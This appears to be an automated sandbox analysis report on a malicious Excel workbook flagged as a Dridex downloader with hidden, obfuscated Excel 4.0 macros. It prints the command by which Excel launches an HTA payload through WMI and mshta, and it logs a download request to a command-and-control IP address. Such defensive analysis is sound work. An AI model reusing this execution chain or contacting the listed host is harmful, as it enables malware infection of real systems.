Loading ...

Play interactive tourEdit tour

Windows Analysis Report 474556085436219490680.xlsb

Overview

General Information

Sample Name:474556085436219490680.xlsb
Analysis ID:528398
MD5:75c325deec0cae07e089f47028c4e444
SHA1:ff3d0672ff1a95212063a42779538c1896d3b77c
SHA256:f4e3013be0615f60a3a6f6d3d3b26aa5239fe270e404dd465e1b99c2b594b4f8
Tags:xlsbxlsx
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex Downloader
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Dridex Downloader
Multi AV Scanner detection for submitted file
Creates and opens a fake document (probably a fake document to hide exploiting)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Creates processes via WMI
Document exploit detected (UrlDownloadToFile)
Found protected and hidden Excel 4.0 Macro sheet
Contains functionality to create processes via WMI
Found obfuscated Excel 4.0 Macro
Queries the volume information (name, serial number etc) of a device
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0
Detected TCP or UDP traffic on non-standard ports
Sigma detected: Suspicious WMI Execution
Sample execution stops while process was sleeping (likely an evasion)
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 7004 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • WMIC.exe (PID: 4008 cmdline: wmic process call create "mshta C:\ProgramData\UXcqTE.rtf" MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • conhost.exe (PID: 4848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • mshta.exe (PID: 6892 cmdline: mshta C:\ProgramData\UXcqTE.rtf MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\UXcqTE.rtfJoeSecurity_DridexDownloaderYara detected Dridex DownloaderJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: wmic process call create "mshta C:\ProgramData\UXcqTE.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\UXcqTE.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 7004, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\UXcqTE.rtf", ProcessId: 4008
      Sigma detected: Suspicious WMI ExecutionShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, juju4, oscd.community: Data: Command: wmic process call create "mshta C:\ProgramData\UXcqTE.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\UXcqTE.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 7004, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\UXcqTE.rtf", ProcessId: 4008

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: 474556085436219490680.xlsbVirustotal: Detection: 28%Perma Link
      Source: 474556085436219490680.xlsbReversingLabs: Detection: 22%
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

      Software Vulnerabilities:

      barindex
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe
      Document exploit detected (UrlDownloadToFile)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
      Source: global trafficTCP traffic: 192.168.2.3:49745 -> 132.148.135.183:8080
      Source: global trafficTCP traffic: 192.168.2.3:49745 -> 132.148.135.183:8080
      Source: global trafficHTTP traffic detected: GET /Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 132.148.135.183:8080Connection: Keep-Alive
      Source: global trafficTCP traffic: 192.168.2.3:49745 -> 132.148.135.183:8080
      Source: Joe Sandbox ViewIP Address: 132.148.135.183 132.148.135.183
      Source: unknownTCP traffic detected without corresponding DNS query: 132.148.135.183
      Source: unknownTCP traffic detected without corresponding DNS query: 132.148.135.183
      Source: unknownTCP traffic detected without corresponding DNS query: 132.148.135.183
      Source: unknownTCP traffic detected without corresponding DNS query: 132.148.135.183
      Source: unknownTCP traffic detected without corresponding DNS query: 132.148.135.183
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://api.aadrm.com
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://api.aadrm.com/
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://api.cortana.ai
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://api.diagnostics.office.com
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://api.microsoftstream.com/api/
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://api.office.net
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://api.onedrive.com
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://apis.live.net/v5.0/
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://augloop.office.com
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://augloop.office.com/v2
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://cdn.entity.
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://clients.config.office.net/
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://config.edge.skype.com
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://cortana.ai
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://cortana.ai/api
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://cr.office.com
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://dataservice.o365filtering.com
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://dataservice.o365filtering.com/
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://dev.cortana.ai
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://devnull.onenote.com
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://directory.services.
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://enrichment.osi.office.net/
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://graph.ppe.windows.net
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://graph.ppe.windows.net/
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://graph.windows.net
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://graph.windows.net/
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://incidents.diagnostics.office.com
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://lifecycle.office.com
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://login.microsoftonline.com/
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://login.windows.local
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://management.azure.com
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://management.azure.com/
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://messaging.office.com/
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://ncus.contentsync.
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://ncus.pagecontentsync.
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://officeapps.live.com
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://onedrive.live.com
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://onedrive.live.com/embed?
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://osi.office.net
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://otelrules.azureedge.net
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://outlook.office.com
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://outlook.office.com/
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://outlook.office365.com
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://outlook.office365.com/
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://pages.store.office.com/review/query
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://powerlift.acompli.net
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://roaming.edog.
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://settings.outlook.com
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://shell.suite.office.com:1443
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://skyapi.live.net/Activity/
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
      Source: 4B93B946-94A6-4DBD-A1CD-B345F4F9DFB7.0.drString found in binary or memory: https://staging.cortana.ai
